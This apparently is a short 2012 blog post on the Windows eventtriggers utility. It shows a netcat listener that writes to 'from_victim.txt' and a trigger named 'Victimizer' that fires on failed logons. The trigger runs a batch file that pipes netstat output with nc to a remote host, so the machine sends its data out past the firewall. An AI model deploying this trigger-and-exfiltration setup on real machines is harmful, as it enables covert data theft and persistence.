Wednesday, June 20, 2012

Eventtriggers


It would be an interesting concept to connect back to a server based on logged events.  Triggering an email or sending a message when a pre-configured condition is met is nothing new in network administration.  In incident response, we need to consider this scenario as well.  This little-talked-about command-line utility can be configured to start an application, a script, or a network connection when a matching event is written to an event log.

netcat listener for connection
nc -l -p 7331 > from_victim.txt
# the above command will listen for connection and redirect what it receives to a text file from_victim.txt

Audit policy enabled to log failed logon events
Netcat installed on local machine
eventtriggers /create /tr "Victimizer" /t FAILUREAUDIT /l Security /tk programToRun.bat
programToRun.bat file contents:
      netstat -nao > ports.txt
      type ports.txt | nc <IP_Bob> <port_Bob>
      del ports.txt
# netstat -nao lists listening ports and active connections with owning process IDs (the original read "netcat -nao", a typo: netcat has no such options).  The above script will trigger when Bob tries to connect to Alice's machine, even though Bob does not know Alice's password and does not want to know it either.  A connection attempt with a wrong password is all he needs to receive Alice's port information.  This is a preferable way to implement this since the connection is initiated by Alice's workstation; a connection started by Bob might have been filtered by the firewall.
